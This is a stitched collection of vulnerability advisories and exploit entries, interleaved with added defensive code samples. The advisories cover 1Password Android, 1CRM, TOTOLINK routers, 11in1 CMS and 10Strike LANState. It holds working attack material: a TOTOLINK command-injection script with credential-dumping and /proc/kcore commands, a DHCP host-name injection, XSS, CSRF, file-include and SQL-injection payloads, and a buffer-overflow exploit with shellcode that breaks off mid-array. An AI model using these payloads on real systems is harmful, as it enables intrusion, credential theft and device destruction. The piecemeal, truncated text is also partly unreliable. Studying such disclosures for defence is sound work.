############
Description
############
The 1Password application for Android, in versions before 7.0, is affected
by a Denial of Service vulnerability. The activities
com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity and
com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity are
exported, so starting either of them from an external application crashes
the running 1Password instance.
############
Poc
############
To invoke the exported activity and crash the app, it is possible
to use Drozer:
run app.activity.start --component com.agilebits.onepassword com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity
############
Affected Components
############
com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity
com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity
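The check behind this class of bug is "which of my activities can another app start at all". The script below is an added example written for this page, not code from 1Password or from the advisory's author: it parses a manifest and lists every activity that is reachable from outside, then emits the drozer line from the PoC above for each one. SAMPLE_MANIFEST is a constructed stand-in that only borrows the two component names from this advisory; its action name and the other activities are invented and it is not the real 1Password manifest.

```python
"""Audit an AndroidManifest.xml for activities that other apps can start.

Added example for this page, not code from 1Password or from the advisory's
author. SAMPLE_MANIFEST is a constructed stand-in that only borrows the two
component names from the advisory; it is not the real 1Password manifest.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample (assumption: shape only, not the vendor's file).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.agilebits.onepassword">
  <application>
    <activity android:name=".filling.openyolo.OpenYoloDeleteActivity"
              android:exported="true" />
    <activity android:name=".filling.openyolo.OpenYoloRetrieveActivity">
      <intent-filter>
        <action android:name="com.example.ACTION_RETRIEVE" />
      </intent-filter>
    </activity>
    <activity android:name=".MainActivity" android:exported="false" />
    <activity android:name=".InternalActivity" />
  </application>
</manifest>
"""


def _android_attr(element, name):
    return element.get("{%s}%s" % (ANDROID_NS, name))


def exported_activities(manifest_xml):
    """Return [(fully qualified activity name, reason)] for every activity an
    external app can start.

    Android's rules: android:exported="true" exports it; when the attribute
    is absent, an activity is exported iff it declares an <intent-filter>
    (the implicit default that apps targeting SDK < 31 still get).
    """
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    found = []
    for activity in root.iter("activity"):
        name = _android_attr(activity, "name") or ""
        if name.startswith("."):
            name = package + name
        exported = _android_attr(activity, "exported")
        has_filter = activity.find("intent-filter") is not None
        if exported == "true":
            found.append((name, 'android:exported="true"'))
        elif exported is None and has_filter:
            found.append((name, "implicitly exported: intent-filter without android:exported"))
    return found


def drozer_commands(manifest_xml):
    """One drozer app.activity.start line per exported activity, in the form
    the PoC above uses, so each can be fired and the app watched for a crash."""
    package = ET.fromstring(manifest_xml).get("package", "")
    return ["run app.activity.start --component %s %s" % (package, name)
            for name, _ in exported_activities(manifest_xml)]


if __name__ == "__main__":
    for name, reason in exported_activities(SAMPLE_MANIFEST):
        print("%s  (%s)" % (name, reason))
    for command in drozer_commands(SAMPLE_MANIFEST):
        print(command)
```

Every activity this lists is an attack surface: it must tolerate an Intent with missing or malformed extras, because an external caller controls all of them. If the activity is only meant for the app itself, android:exported="false" removes it from the list entirely.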
############
Disclosure timeline
############
2018-07-27 Contacting 1Password
2018-07-30 1Password acknowledges the vulnerability
2018-08-22 The vulnerability is fixed and made public
Valerio Brussani (@val_brux)
******************************************************************
* 1CRM On-Premise Software 8.5.7 *
* Stored XSS *
******************************************************************
# Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting
# Date: 19/07/2019
# Exploit Author: Kusol Watchara-Apanukorn
# Vendor Homepage: https://1crm.com/
# Version: <= 8.5.7
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-14221
1CRM On-Premise Software 8.5.7 allows stored XSS via a payload that is
mishandled during a Run Report operation.
Vulnerability Description:
XSS flaws occur whenever an application includes untrusted data in a
new web page without proper validation or escaping, or updates an
existing web page with user supplied data using a browser API that can
create JavaScript. XSS allows attackers to execute scripts in the
victim’s browser which can hijack user sessions, deface web sites, or
redirect the user to malicious sites.
########################################################################################################################
Attack Narratives and Scenarios:

**Attacker**
1. Log in as any user
2. Click the Email icon
3. Click Report
4. Click Create Report
5. Fill in the Report Name (in our case: Company B)
6. Assign it to the victim (in our case: admin)
7. Click Column Layout
8. Click Add empty column
9. Input the malicious code (in our case: <script>alert(document.cookie);</script>)
10. Click Save

**Victim**
1. Click the Email icon
2. Click Report
3. Choose the report that was just created (in our case: Company B)
4. Click Run Report
5. The admin's cookie pops up in an alert
########################################################################################################################
PoC
-----------------------------------------
Github: https://github.com/cccaaasser/1CRM-CVE/blob/master/CVE-2019-14221.md
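The defect is in step 4 of the victim's path: the stored column label is written into the Run Report page as markup. The following is an added example for this page, not 1CRM code; the report dict is a stand-in for the stored record and the label is the payload from the narrative above. It renders the header cell both ways and then checks the result the way a browser would see it, by parsing the markup and listing the elements it creates, which is the property a fix actually has to establish.

```python
"""Stored XSS in a report column label: the unescaped rendering beside the
escaped one, checked by parsing the output rather than by eyeballing it.

Added example for this page; it is not 1CRM code. The report is a dict
standing in for the stored record, and the label is the payload from the
advisory.
"""
import html
from html.parser import HTMLParser

PAYLOAD = "<script>alert(document.cookie);</script>"

# Constructed stand-in for the stored report the attacker assigned to admin.
REPORT = {"name": "Company B", "columns": ["Account", PAYLOAD]}


def render_header_vulnerable(label):
    """Label concatenated into HTML as stored: attacker markup becomes DOM."""
    return "<th>" + label + "</th>"


def render_header_safe(label):
    """Escape for the HTML element-body context. quote=True also covers the
    attribute context in case the same helper is reused there."""
    return "<th>" + html.escape(label, quote=True) + "</th>"


def run_report(report, render_header):
    """Mimics the Run Report page: one header cell per configured column."""
    cells = "".join(render_header(c) for c in report["columns"])
    return "<table><tr>" + cells + "</tr></table>"


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_tags(rendered_html):
    """Tags a browser would actually create from the markup; escaped text
    produces none, which is what an XSS fix has to guarantee."""
    collector = _TagCollector()
    collector.feed(rendered_html)
    return collector.tags


if __name__ == "__main__":
    for render in (render_header_vulnerable, render_header_safe):
        page = run_report(REPORT, render)
        print(render.__name__, element_tags(page))
```

Escaping at output time is the fix rather than stripping on input: the label is still stored verbatim (a legitimate "<5%" column name survives), and every page that prints it applies the encoding for its own context.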
Vulnerability Disclosure Timeline:
==================================
19 July 2019 : Vulnerability found
19 July 2019 : Vendor notified
24 July 2019 : Vendor response
24 July 2019 : Vendor fix
31 July 2019 : Vendor released patched version 8.5.10
## Advisory Information
Title: 15 TOTOLINK router models vulnerable to multiple RCEs
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
Date published: 2015-07-16
Vendors contacted: None
Release mode: 0days, Released
CVE: no current CVE
## Product Description
TOTOLINK is a sister brand of ipTIME, which holds over 80% of the SOHO
market in South Korea.
TOTOLINK produces routers, Wi-Fi access points and network devices.
Their products are sold worldwide.
## Vulnerabilities Summary
The first vulnerability allows an attacker to bypass the admin
authentication and get direct RCE from the LAN side with a single HTTP
request.
The second vulnerability allows an attacker to bypass the admin
authentication and get direct RCE from the LAN side with a single DHCP
request.
Both are direct RCEs against the routers that give complete root access
to the embedded Linux from the LAN side.
The two RCEs affect 13 TOTOLINK products, from 2009-era firmwares to the
latest firmwares, in the default configuration:
- TOTOLINK A1004: up to the latest firmware (9.34 - za1004_en_9_34.bin)
- TOTOLINK A5004NS: up to the latest firmware (9.38 - za5004s_en_9_38.bin)
- TOTOLINK EX300: up to the latest firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net)
- TOTOLINK EX300: up to the latest firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn)
- TOTOLINK N150RB: up to the latest firmware (9.08 - zn150rb_en_9_08.bin.5357c0)
- TOTOLINK N300RB: up to the latest firmware (9.26 - zn300rb_en_9_26.bin)
- TOTOLINK N300RG: up to the latest firmware (8.70 - TOTOLINK N300RG_8_70.bin)
- TOTOLINK N500RDG: up to the latest firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)
- TOTOLINK N600RD: up to the latest firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)
- TOTOLINK N302R Plus V1: up to the latest firmware (8.82 - TOTOLINK N302R Plus V1_en_8_82.bin)
- TOTOLINK N302R Plus V2: up to the latest firmware (9.08 - TOTOLINK N302R Plus V2_en_9_08.bin)
- TOTOLINK A3004NS (no firmware available on totolinkusa.com, but ipTIME's A3004NS model was vulnerable to the 2 RCEs)
- TOTOLINK EX150: up to the latest firmware (8.82 - ex150_ch_8_82.bin.5357c0)
The DHCP RCE also affects 2 TOTOLINK products, from 2009-era firmwares
to the latest firmwares, in the default configuration:
- TOTOLINK A2004NS: up to the latest firmware (9.60 - za2004s_en_9_60.bin)
- TOTOLINK EX750: up to the latest firmware (9.60 - ex750_en_9_60.bin)
Firmwares come from totolink.net and from totolink.cn.
From my tests, it is possible to use these vulnerabilities to overwrite
the firmware with a custom (backdoored) firmware.
Given the high CVSS score (10/10) of the vulnerabilities and their
longevity (6+ years), TOTOLINK users are urged to contact TOTOLINK.
## Details - RCE with a single HTTP request
The HTTP server lets the attacker execute some CGI files. Many of them
are vulnerable to command injection, which allows executing commands
with the rights of the HTTP daemon user (root).
Exploit code:
$ cat totolink.carnage
#!/bin/sh
# Usage: ./totolink.carnage <router ip> <command> [arg] [arg]
# POSTs a shell snippet to /cgi-bin/sh. The echoed header line makes the
# reply readable; PATH is extended on the device so /sbin binaries resolve
# (escaped so it expands remotely, not on the attacker's shell).
if [ ! "$1" ]; then
  echo "Usage:"
  echo "$0 ip command"
  exit 1
fi
wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=\$PATH:/sbin $2 $3 $4" "http://$1/cgi-bin/sh"
The exploits have also been written in HTML/JavaScript, as CSRF attacks,
so that people can test their own devices live from their browsers:
http://pierrekim.github.io/advisories/
o Listing of the filesystem
HTML/JS exploits:
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html
Using CLI:
root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head
ash
auth
busybox
cat
chmod
cp
d.cgi
date
echo
false
root@kali:~/totolink#
o How to retrieve the credentials (see the login and password at the end
of the dumped file):
HTML/JS exploits:
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html
Using CLI:
kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg
wantype.wan1=dynamic
dhblock.eth1=0
ppp_mtu=1454
fakedns=0
upnp=1
ppp_mtu=1454
timeserver=time.windows.com,gmt22,1,480,0
wan_ifname=eth1
auto_dns=1
dhcp_auto_detect=0
wireless_ifmode+wlan0=wlan0,0
dhcpd=0
lan_ip=192.168.1.1
lan_netmask=255.255.255.0
dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0
dhcpd_dns=164.124.101.2,168.126.63.2
dhcpd_opt=7200,30,200,
dhcpd_configfile=/etc/udhcpd.conf
dhcpd_lease_file=/etc/udhcpd.leases
dhcpd_static_lease_file=/etc/udhcpd.static
use_local_gateway=1
login=admin
password=admin
Login and password are stored in plaintext, which is a very bad
security practice.
o Current running process:
HTML/JS exploits:
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html
Using CLI:
kali# ./totolink.carnage 192.168.1.1 ps -auxww
o Getting the kernel memory:
HTML/JS exploits:
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html
Using CLI:
kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore
o Default firewall rules:
HTML/JS exploits:
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html
Using CLI:
kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL
o Opening the management interface on the WAN:
HTML/JS exploits:
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html
o Reboot the device:
HTML/JS exploits:
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html
o Brick the device:
HTML/JS exploits:
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html
An attacker can use the /usr/bin/wget binary located in the file
system of the remote device to plant a backdoor and then execute it as
root.
By the way, d.cgi in /bin/ is an intentional backdoor.
## Details - RCE with a single DHCP request
This vulnerability is the exact inverse of CVE-2011-0997 (where a rogue
DHCP server injected commands into the client): the DHCP server in
TOTOLINK devices allows remote attackers to execute arbitrary commands
via shell metacharacters in the host-name field of a client request.
Sending a DHCP request with this parameter will reboot the device:
$ cat /etc/dhcp/dhclient.conf
send host-name ";/sbin/reboot";
When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we
will see the stdout of the /dev/console device;
the dhcp request will immediately force the reboot of the remote device:
Booting...
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[...]
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).
Launch iwcontrol: wlan0
Reaped 317
iwcontrol RUN OK
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
WAN0 IP: 192.168.2.1
signalling START
Invalid upnpd exit
killall: upnpd: no process killed
upnpd Restart 1
iptables: Bad rule (does a matching rule exist in that chain?)
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
Update Session timestamp and try it after 5 seconds again.
ez_ipupdate callback --> time_elapsed: 0
Run DDNS by IP change: / 192.168.2.1
Reaped 352
iptables: Bad rule (does a matching rule exist in that chain?)
Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file
Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
Reaped 363
Led Silent Callback
Turn ON All LED
Dynamic Channel Search for wlan0 is OFF
start_signal => plantynet_sync
Do start_signal => plantynet_sync
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
Reaped 354
iptables: Bad rule (does a matching rule exist in that chain?)
ez_ipupdate callback --> time_elapsed: 1
Run DDNS by IP change: / 192.168.2.1
Burst DDNS Registration is denied: iptime -> now:26
Led Silent Callback
Turn ON All LED
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
- - - ---> Plantynet Event : 00000003
- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE
[sending the DHCP request]
[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1
00:01:03 miniupnpd[370]: received signal 15, good-bye
Reaped 392
Reaped 318
Reaped 314
Reaped 290
Reaped 288
Reaped 268
Reaped 370
Reaped 367
- - - ---> PLANTYNET_SYNC_FREE_DEVICE
Restarting system.
Booting...
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Reboot Result from Watchdog Timeout!
- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
Delay 1 second till reset button
Magic Number: raw_nv 00000000
Check Firmware(05020000) : size: 0x001ddfc8 ---->
[...]
An attacker can use the /usr/bin/wget binary located in the file
system of the remote device to plant a backdoor and then execute it as
root.
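To make the DHCP vector concrete, the following is an added example written for this page; it is not TOTOLINK or ipTIME firmware code nor the author's tooling. It builds the DHCPDISCOVER that dhclient would send with the host-name above, parses the options area the way a server does, and shows the hypothetical vulnerable hook (the client name pasted into a root command line, a reconstruction of the pattern the advisory describes, not disassembled vendor code) next to the hostname validation that has to sit between option 12 and any shell. The MAC address is constructed and nothing is sent on the wire.

```python
"""DHCP option 12 (host-name) command injection: building the request the
advisory describes, parsing it the way a dhcpd would, and the validation that
has to sit between the option and any shell.

Added example for this page; it is not TOTOLINK/ipTIME firmware code or the
author's tooling. vulnerable_lease_hook() is a hypothetical reconstruction of
the pattern the advisory describes (client name pasted into a command line
run as root), not disassembled vendor code. Nothing is sent on the wire.
"""
import re
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_HOST_NAME, OPT_MSG_TYPE, OPT_END = 0, 12, 53, 255
DHCPDISCOVER = 1
INJECTED_NAME = ";/sbin/reboot"          # the host-name from the advisory


def build_discover(chaddr, host_name, xid=0x3903F326):
    """Minimal RFC 2131 DHCPDISCOVER: 236-byte BOOTP header, cookie, options."""
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        1, 1, 6, 0,                 # op=BOOTREQUEST, htype=Ethernet, hlen=6, hops
        xid, 0, 0x8000,             # xid, secs, flags (broadcast bit)
        b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,   # ciaddr yiaddr siaddr giaddr
        chaddr.ljust(16, b"\0"),    # client hardware address, padded to 16
        b"\0" * 64, b"\0" * 128,    # sname, file
    )
    name = host_name.encode("ascii")
    options = (bytes([OPT_MSG_TYPE, 1, DHCPDISCOVER])
               + bytes([OPT_HOST_NAME, len(name)]) + name
               + bytes([OPT_END]))
    return header + MAGIC_COOKIE + options


def parse_options(packet):
    """{option code: raw value} from the options area, skipping PAD bytes."""
    body = packet[236:]
    if body[:4] != MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    i, options = 4, {}
    while i < len(body):
        code = body[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        length = body[i + 1]
        options[code] = body[i + 2:i + 2 + length]
        i += 2 + length
    return options


# RFC 952 / RFC 1123 label: alphanumerics and hyphens, no leading or
# trailing hyphen, at most 63 chars; the whole name at most 253 chars.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_hostname(name):
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def vulnerable_lease_hook(host_name):
    """Hypothetical vulnerable pattern (not vendor code): the name goes into
    a command line that is later handed to /bin/sh, so ';' terminates the
    intended command and starts the attacker's."""
    return "update_lease " + host_name


def safe_lease_hook(host_name):
    """Same hook with the check a dhcpd must do before the value leaves the
    option parser; a rejected name never reaches a shell."""
    if not is_valid_hostname(host_name):
        raise ValueError("host-name is not a valid hostname: %r" % host_name)
    return "update_lease " + host_name


if __name__ == "__main__":
    pkt = build_discover(b"\x00\x11\x22\x33\x44\x55", INJECTED_NAME)  # constructed MAC
    name = parse_options(pkt)[OPT_HOST_NAME].decode("ascii")
    print("command a vulnerable dhcpd would run:", vulnerable_lease_hook(name))
    try:
        safe_lease_hook(name)
    except ValueError as err:
        print("hardened dhcpd:", err)
```

The allow-list is the point: a hostname has a tight grammar, so rejecting anything outside it removes every shell metacharacter without trying to enumerate them, and it applies equally to the lease-file, DNS and UI paths that a router daemon feeds the name into.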
## Vendor Response
Because of the "un-ethical code" found in TOTOLINK products (the
backdoors found in new TOTOLINK devices), TOTOLINK was not contacted
about this case; ipTIME was contacted in April 2015 concerning the
first RCE.
## Report Timeline
* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in
ipTIME products.
* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.
* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.
* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in the A2004NS and
EX750 routers.
* Jul 13, 2015: The updated firmwares are confirmed still vulnerable (to
the DHCP RCE).
* Jul 16, 2015: A public advisory is sent to security mailing lists.
## Credit
These vulnerabilities were found by Alexandre Torres and Pierre Kim
(@PierreKimSec).
## References
https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
## Disclaimer
This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
source: https://www.securityfocus.com/bid/52025/info
11in1 is prone to a cross-site request-forgery and a local file include vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
11in1 1.2.1 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin/index.php?class=do&action=addTopic" method="post">
<input type="hidden" name="name" value="New Topic Name here">
<input type="hidden" name="sec" value="3">
<input type="hidden" name="content" value="New Topic Content here">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
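The auto-submitting form works because the addTopic handler accepts any POST that arrives with the victim's session cookie. The following is an added example for this page, not 11in1 code: a synchronizer-token check of the kind that handler lacks, with a stand-in session store and the advisory's form fields used as the attacker's request. The cross-site form can ride on the cookie, but it cannot carry a token it never saw.

```python
"""Synchronizer-token check of the kind the addTopic handler above lacks.

Added example for this page, not 11in1 code. The handler is a stand-in; the
attacker's POST is the auto-submitted form above, which rides on the victim's
cookie but cannot carry a token it never saw.
"""
import hashlib
import hmac
import secrets

# Server-side key, generated per deployment (assumption: a single process).
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token bound to the session, so it is useless from any other session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id, presented):
    if not presented:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), presented)


def add_topic(session_id, form):
    """Stand-in for admin/index.php?class=do&action=addTopic: the cookie
    (session_id) alone is not enough; the form must carry the token."""
    if not csrf_token_valid(session_id, form.get("csrf_token")):
        return 403, "rejected: missing or invalid CSRF token"
    return 200, "topic %r added to section %s" % (form["name"], form["sec"])


# Constructed request: the advisory's form fields, exactly as the cross-site
# page submits them, with no token.
ATTACKER_FORM = {"name": "New Topic Name here", "sec": "3",
                 "content": "New Topic Content here"}


def legitimate_form(session_id):
    """What the site's own admin page submits: same fields plus the token
    it rendered into the form for this session."""
    form = dict(ATTACKER_FORM)
    form["csrf_token"] = issue_csrf_token(session_id)
    return form


if __name__ == "__main__":
    victim = "sess-victim-1"
    print(add_topic(victim, ATTACKER_FORM))                    # 403
    print(add_topic(victim, legitimate_form(victim)))          # 200
    print(add_topic(victim, legitimate_form("sess-attacker"))) # 403
```

The token is compared with hmac.compare_digest so the check is constant-time, and it is derived from the session rather than stored, so a token minted for the attacker's own session fails against the victim's. Marking the session cookie SameSite=Lax is a second, independent layer: browsers then omit it from this kind of cross-site POST in the first place.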
source: https://www.securityfocus.com/bid/52025/info
Local file-include PoC from the same advisory (11in1 1.2.1; other versions may also be affected):
http://www.example.com/index.php?class=../../../tmp/file%00
source: https://www.securityfocus.com/bid/52306/info
11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
11in1 1.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/11in1/admin/tps?id=1'[SQL Injection Vulnerability!]
source: https://www.securityfocus.com/bid/52306/info
Second SQL-injection PoC from the same advisory (11in1 1.2.1):
http://www.example.com/11in1/admin/comments?topicID=1'[SQL Injection Vulnerability!]
source: https://www.securityfocus.com/bid/52025/info
Second local file-include PoC from the same advisory (11in1 1.2.1):
http://www.example.com/admin/index.php?class=../../../tmp/file%00
# Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
# Date: 2020-04-01
# Exploit Author: Hodorsec
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
# Vendor Homepage: https://www.10-strike.com/
# Tested on: Win7 x86 SP1 - Build 7601
# Description:
# - Exploits the "Force Check" option when listing the Host Checks under "Check List". Entering an overly long string results in a crash that overwrites the SEH record.
# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open LANState, use any "Map", for example the "demo_map"
# - Click on tab "Home", click option "Check List"
# - Rightclick on any existing hostname and click "Edit"
# - Paste the value from clipboard in the field "Host address (name)"
# - Next, Next, Finish
# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
# - Check results
# WinDBG initial crash output using only A's:
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
# LANState+0x2e57:
# 00402e57 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???
#!/usr/bin/python
import sys,struct
# Filename
filename = "10_strike_lanstate-poc.txt"
# Maximum length
maxlen = 10000
# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
# Payload size: 447 bytes
shellcode = (
"\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59"
"\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e"
"\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32"
"\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e"
"\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61"
"\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56"
"\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b"
"\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32"
"\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59"
"\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43"
"\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d"
"\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63"
"\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38"
"\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76"
"\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b"
"\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45"
"\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f"
"\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x4a\x4b\x6c"
"\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70"
